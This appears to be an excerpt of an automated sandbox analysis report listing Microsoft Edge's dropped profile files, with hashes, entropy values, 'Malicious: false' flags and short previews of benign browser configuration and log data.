SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports~RF5c57a.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Sdch Dictionaries (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.1275671571169275
Encrypted:	false
SSDEEP:	3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:	20D4B8FA017A12A108C87F540836E250
SHA1:	1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:	6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:	507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:	false
Preview:	{"SDCH":{"dictionaries":{},"version":2}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Sdch Dictionaries~RF573d0.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.1275671571169275
Encrypted:	false
SSDEEP:	3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:	20D4B8FA017A12A108C87F540836E250
SHA1:	1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:	6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:	507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:	false
Preview:	{"SDCH":{"dictionaries":{},"version":2}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Sdch Dictionaries~RF62117.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.1275671571169275
Encrypted:	false
SSDEEP:	3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:	20D4B8FA017A12A108C87F540836E250
SHA1:	1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:	6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:	507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:	false
Preview:	{"SDCH":{"dictionaries":{},"version":2}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Trust Tokens

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 9, cookie 0x7, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	36864
Entropy (8bit):	0.3886039372934488
Encrypted:	false
SSDEEP:	24:TLqEeWOT/kIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:T2EeWOT/nDtX5nDOvyKDhU1cSB
MD5:	DEA619BA33775B1BAEEC7B32110CB3BD
SHA1:	949B8246021D004B2E772742D34B2FC8863E1AAA
SHA-256:	3669D76771207A121594B439280A67E3A6B1CBAE8CE67A42C8312D33BA18854B
SHA-512:	7B9741E0339B30D73FACD4670A9898147BE62B8F063A59736AFDDC83D3F03B61349828F2AE88F682D42C177AE37E18349FD41654AEBA50DDF10CD6DC70FA5879
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\a4c38b14-a522-486f-ae91-f72f26921a0d.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\bae81541-9a72-4878-be79-ba286a9b4fa6.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\e505e589-4a2a-4bb1-bd79-f467b6d2e4c7.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.1275671571169275
Encrypted:	false
SSDEEP:	3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:	20D4B8FA017A12A108C87F540836E250
SHA1:	1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:	6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:	507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:	false
Preview:	{"SDCH":{"dictionaries":{},"version":2}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	80
Entropy (8bit):	3.4921535629071894
Encrypted:	false
SSDEEP:	3:S8ltHlS+QUl1ASEGhTFljl:S85aEFljl
MD5:	69449520FD9C139C534E2970342C6BD8
SHA1:	230FE369A09DEF748F8CC23AD70FD19ED8D1B885
SHA-256:	3F2E9648DFDB2DDB8E9D607E8802FEF05AFA447E17733DD3FD6D933E7CA49277
SHA-512:	EA34C39AEA13B281A6067DE20AD0CDA84135E70C97DB3CDD59E25E6536B19F7781E5FC0CA4A11C3618D43FC3BD3FBC120DD5C1C47821A248B8AD351F9F4E6367
Malicious:	false
Preview:	*...#................version.1..namespace-..&f.................&f...............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	422
Entropy (8bit):	5.270659550845692
Encrypted:	false
SSDEEP:	12:+Dv4YebvqBZFUt8B0Fh/+BZ5LYebvqBaJ:M4Yebvyg8i4LYebvL
MD5:	D592A938F7396633CE9E355B25220F99
SHA1:	65AB0D4BE8256BB749B92232E1FF4902EE760AF3
SHA-256:	AC2184A7871D96E5E88113325C8E8CC0DD3D46029A4FDEAA54D80EA05285D7C5
SHA-512:	7BCDF28811418476E6EA58893DC914D36D621CE87D337DE50D1C9E1339D89C9ECB0B60A1F15A1AD530AEDDA0CEA1A5448BB079ECE97AFA44ADC9A43C3B906A10
Malicious:	false
Preview:	2024/11/13-14:39:54.979 1c64 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/11/13-14:39:54.980 1c64 Recovering log #3.2024/11/13-14:39:54.983 1c64 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	422
Entropy (8bit):	5.270659550845692
Encrypted:	false
SSDEEP:	12:+Dv4YebvqBZFUt8B0Fh/+BZ5LYebvqBaJ:M4Yebvyg8i4LYebvL
MD5:	D592A938F7396633CE9E355B25220F99
SHA1:	65AB0D4BE8256BB749B92232E1FF4902EE760AF3
SHA-256:	AC2184A7871D96E5E88113325C8E8CC0DD3D46029A4FDEAA54D80EA05285D7C5
SHA-512:	7BCDF28811418476E6EA58893DC914D36D621CE87D337DE50D1C9E1339D89C9ECB0B60A1F15A1AD530AEDDA0CEA1A5448BB079ECE97AFA44ADC9A43C3B906A10
Malicious:	false
Preview:	2024/11/13-14:39:54.979 1c64 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/11/13-14:39:54.980 1c64 Recovering log #3.2024/11/13-14:39:54.983 1c64 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	328
Entropy (8bit):	5.216499047150123
Encrypted:	false
SSDEEP:	6:HUtcRlyq2P923oH+TcwtpIFUt8YUtUjz1Zmw+YUtUjlRkwO923oH+Tcwta/WLJ:3nyv4YebmFUt8UZ/+UlR5LYebaUJ
MD5:	B54C12A0951B745EE811691450E494FB
SHA1:	8250820246D47D4D498E5093D41A9E2E48DC33CE
SHA-256:	09765C81E689178BDFCD8ED9A51680A8F1F27FC4A7E5EDEA4DD3E95E7C211555
SHA-512:	1BEAE36C2BAF047BFC544726857E69867AA53F7A9214D85FEC6643E33F5048BC81171118F39E1DABA2A1A1B9EF6FD4D4A7C5A871F6ADA5F989F886F1E010C19A
Malicious:	false
Preview:	2024/11/13-14:39:36.789 1e34 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/11/13-14:39:36.796 1e34 Recovering log #3.2024/11/13-14:39:36.796 1e34 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	328
Entropy (8bit):	5.216499047150123
Encrypted:	false
SSDEEP:	6:HUtcRlyq2P923oH+TcwtpIFUt8YUtUjz1Zmw+YUtUjlRkwO923oH+Tcwta/WLJ:3nyv4YebmFUt8UZ/+UlR5LYebaUJ
MD5:	B54C12A0951B745EE811691450E494FB
SHA1:	8250820246D47D4D498E5093D41A9E2E48DC33CE
SHA-256:	09765C81E689178BDFCD8ED9A51680A8F1F27FC4A7E5EDEA4DD3E95E7C211555
SHA-512:	1BEAE36C2BAF047BFC544726857E69867AA53F7A9214D85FEC6643E33F5048BC81171118F39E1DABA2A1A1B9EF6FD4D4A7C5A871F6ADA5F989F886F1E010C19A
Malicious:	false
Preview:	2024/11/13-14:39:36.789 1e34 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/11/13-14:39:36.796 1e34 Recovering log #3.2024/11/13-14:39:36.796 1e34 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 10
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.2645845045424058
Encrypted:	false
SSDEEP:	384:8/2qOB1nxCkMLSAELyKOMq+8yC8F/YfU5m+OlTLVumO:Bq+n0JL9ELyKOMq+8y9/OwN
MD5:	8339C8DAA3882DF85F773A570625824E
SHA1:	2D1DE51BC34E2BA31ADA9246F5F52C7C0E5283B2
SHA-256:	22339632CE47F7198FC63AFC153CE047A5767B2E967551B64E17CDE8779AA469
SHA-512:	CED81F1D902DC177B8D34AC37C03DC25F1E21EC89E4377E9086473CDC0DEFA6C9B3D99389E496A059D196912369B0D5239D03441350C6B248D1D7985C9934BAF
Malicious:	false
Preview:	SQLite format 3......@ .......[...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\WebStorage\QuotaManager

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 10, cookie 0x7, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.4670266180081829
Encrypted:	false
SSDEEP:	48:Tnj7dojKsKmjKZKAsjZNOjAhts3N8g1j3UcB0+cV:v7doKsKuKZKlZNmu46yjx0J
MD5:	5B54DB62C5BD57EC94C4BFE8117C98DD
SHA1:	0E97773F0624E9BB069B18335A92F4865C34335F
SHA-256:	853DBE2774C79ECBB22D3446980E670FE204527938ED6898D6B15855008B287C
SHA-512:	CBD159BA7B7AB10D55C473A97F4269D8ABC249C3665FBF6971F6197FF22D5DDDFD7FCB664175568A73171388C836A95E9165023E2A2402E6E1E01E4DB8FE2203
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.......w..g...........M...w..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\arbitration_service_config.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with very long lines (3951), with CRLF line terminators
Category:	dropped
Size (bytes):	11755
Entropy (8bit):	5.190465908239046
Encrypted:	false
SSDEEP:	192:hH4vrmqRBB4W4PoiUDNaxvR5FCHFcoaSbqGEDI:hH4vrmUB6W4jR3GaSbqGEDI
MD5:	07301A857C41B5854E6F84CA00B81EA0
SHA1:	7441FC1018508FF4F3DBAA139A21634C08ED979C
SHA-256:	2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
SHA-512:	00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
Malicious:	false
Preview:	{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\bb7cb896-6366-490f-a415-0e4897fb6c27.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with very long lines (16634), with no line terminators
Category:	dropped
Size (bytes):	16634
Entropy (8bit):	5.4357396685023325
Encrypted:	false
SSDEEP:	384:stxPGQSu4Ms6ifhKKmOhvk64bGxQwY6WWaTYT:sPOXuFifObGiD6aTYT
MD5:	B68038D8D86C8D7E7BFD658504F1C1E7
SHA1:	3C470638C1D78253D6CB7D917539E6B9E5345822
SHA-256:	B8DABEB2D3658516DAC8FA766AC48402D1086503431E7F4D9BEB3C0FBF2FFEAA
SHA-512:	F12C14F62562A10BBF12045AB2D874847606F5D642B5A4DE0FDE707F4AAEF657A5F22C55A5F9E86B9BA14138019507685675A1471DFBAABB17E54F08B8BF6896
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13376000377231072","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\d56efd2c-9870-4ea2-9a33-9d5265426d93.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40470
Entropy (8bit):	5.561319377685138
Encrypted:	false
SSDEEP:	768:pCt2Yv7pLGLp7JWPU6fau8F1+UoAYDCx9Tuqh0VfUC9xbog/OVNrEb4pbrwzvOk1:pCt2Ypcp7JWPU6fauu1ja4rEEpwzvOk1
MD5:	2401D892E8C16B9F9952BD5C612272F1
SHA1:	D883D5F8530C53607DC699AAE022A404556756D6
SHA-256:	CD007A8143CD319AEE96C1A17C3D58DD08A58EEDF490C6234CF7BDBFBA3FF6CE
SHA-512:	4EB809F8A2033EFB0B05F82355D21D957636D6A90973EA97E7EA02749C3162051A7B6FE816E49272D986F10E743B4978714E021E68C06486E1FB0AF076C4D799
Malicious:	false
Preview:	{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13376000376727965","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13376000376727965","location":5,"ma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\da8bc611-d6d3-4397-b4fd-138b6966f99a.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:L:L
MD5:	5058F1AF8388633F609CADB75A75DC9D
SHA1:	3A52CE780950D4D969792A2559CD519D7EE8C727
SHA-256:	CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
SHA-512:	0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
Malicious:	false
Preview:	.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\databases\Databases.db

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x4, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	0.3410017321959524
Encrypted:	false
SSDEEP:	12:TLiqi/nGb0EiDFIlTSFbyrKZb9YwFOqAyl+FxOUwa5qgufTJpbZ75fOSG:TLiMNiD+lZk/Fj+6UwccNp15fBG
MD5:	98643AF1CA5C0FE03CE8C687189CE56B
SHA1:	ECADBA79A364D72354C658FD6EA3D5CF938F686B
SHA-256:	4DC3BF7A36AB5DA80C0995FAF61ED0F96C4DE572F2D6FF9F120F9BC44B69E444
SHA-512:	68B69FCE8EF5AB1DDA2994BA4DB111136BD441BC3EFC0251F57DC20A3095B8420669E646E2347EAB7BAF30CACA4BCF74BD88E049378D8DE57DE72E4B8A5FF74B
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g.....P....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\e8ea44ad-a40e-4ff9-9975-34e0eb90814a.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with very long lines (1597), with CRLF line terminators
Category:	dropped
Size (bytes):	115717
Entropy (8bit):	5.183660917461099
Encrypted:	false
SSDEEP:	1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
MD5:	3D8183370B5E2A9D11D43EBEF474B305
SHA1:	155AB0A46E019E834FA556F3D818399BFF02162B
SHA-256:	6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
SHA-512:	B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
Malicious:	false
Preview:	{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs\|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs\|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-shm

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.10553777989245532
Encrypted:	false
SSDEEP:	12:Jntz5ntzHMpEjVl/PnnnnnnnnnnnnvoQJEopmMl:Jntz5ntzYoPnnnnnnnnnnnnvjj9l
MD5:	9E02E88FA12734693ED0A83975C109C0
SHA1:	0407DC34D9CABDDB130DB5385BE37FB8BCE1C60A
SHA-256:	D27CA0501B9345110A456EFBD185E8F42465CCBA8799C4C3E82EF75A92463589
SHA-512:	1D86BE4480028808D0793260DAE4E3AF838B4C3CDE29F2E26F811D2AFF83EBF8DA218EA0ACFFCF4721E8FC1517A43FCF8890B45C3B2C52D7DACF7F40AC5F47B5
Malicious:	false
Preview:	..-.............Q........ ~..K>-.4..}......K.O}..-.............Q........ ~..K>-.4..}......K.O}........M...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-wal

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite Write-Ahead Log, version 3007000
Category:	dropped
Size (bytes):	333752
Entropy (8bit):	0.9326386112447013
Encrypted:	false
SSDEEP:	384:G2LytIW72hBAWZ9eCmCS72mv1x3v8fyqyG2x0v8Ay4ByKOysxyvv7:z6C
MD5:	6FF9864DBF13C70796AD8F1752DFE5B7
SHA1:	1CDA1BAE2A89CC0FA93FB93BD36DD3498FE9AD1C
SHA-256:	BB8DBE3A2E88A1A311D4141130393DAAC1BAB5923C9FDE369A21A8B233455234
SHA-512:	D031EB271320D9EB01311EABBF369E2B487ED7CFFEC6C9011864E8C4668B08D476B504DA3E17BCDD41371D2AC7266D95B4445CACDC4B880095907266361137C7
Malicious:	false
Preview:	7....-...........4..}...8.?L.0.........4..}........C.SQLite format 3......@ ..........................................................................j.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	723
Entropy (8bit):	3.215302860831072
Encrypted:	false
SSDEEP:	12:Wlc8NOuuuuuuuuuuuuuuuuuuuuuuuUQU8q:iD
MD5:	F0CD7EB2A8EBF681EA0DCD33BF9D7B44
SHA1:	70E8ECDA01DF00905416174B1655A78A0687921C
SHA-256:	8473AC781F8685F0CD12CEEC1B1F2056CDAD37C81CD3E5AE80845139224B7E8D
SHA-512:	4AB5DF519901392D99C6C193C67577E762AB3E20172FC572237D3C6F37CBA4AE942680B9691D1786C36D91EA07A55FA0FE5E79EFBC5E2121A06F0A0C9ECD50A2
Malicious:	false
Preview:	A..r.................20_1_1...1.,U.................20_1_1...1..}0................39_config..........6.....n ....1u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=..................C0................39_config..........6.....n ...1V.e................V.e................V.e................V.e................V.e................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
